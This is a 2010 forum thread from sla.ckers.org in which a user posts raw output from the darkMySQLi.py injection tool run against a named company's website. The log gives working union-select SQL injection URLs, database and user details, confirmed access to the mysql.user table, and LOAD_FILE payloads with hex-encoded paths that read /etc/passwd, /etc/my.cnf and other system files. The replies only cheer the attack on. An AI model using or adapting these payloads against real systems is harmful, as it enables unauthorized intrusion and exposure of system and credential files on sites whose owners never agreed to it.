Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
dragonsoft "security site"
Posted by: VMw4r3
Date: May 06, 2010 04:26PM

dragonsoft.com, either a honeypot or a really bad waf site.


[+] URL: http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,darkc0de,3,4,5,6
[+] 15:19:04
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dragonsoft
User: www@www-local.dragonsoft.com
Version: 5.1.30-log

[+] Do we have Access to MySQL Database: YES <-- w00t w00t

[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 14

[+] Do we have Access to Load_File: YES <-- w00t w00t
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,darkc0de,3,4,5,6
[+] 15:24:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dragonsoft
User: www@www-local.dragonsoft.com
Version: 5.1.30-log

[+] Do we have Access to MySQL Database: YES <-- w00t w00t

[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 14

[+] Do we have Access to Load_File: YES <-- w00t w00t

[+] Starting Load_File Fuzzer...
[+] Number of tables names to be fuzzed: 236

[!] Found /etc/passwd
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6--
[!] Found /etc/hosts
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6--
[!] Found /etc/motd
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6--
[!] Found /etc/fstab
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6673746162),3,4,5,6--
[!] Found /etc/my.cnf
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6d792e636e66),3,4,5,6--
[!] Found /etc/group
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f67726f7570),3,4,5,6--

Re: dragonsoft "security site"
Posted by: Skyphire
Date: May 07, 2010 06:53PM

haha awesome work.

Re: dragonsoft "security site"
Posted by: Skyphire
Date: May 07, 2010 06:54PM

They got cool animated gifs though.


Re: dragonsoft "security site"
Posted by: skpx_
Date: May 08, 2010 10:54AM

VMw4r3 long time no see :p
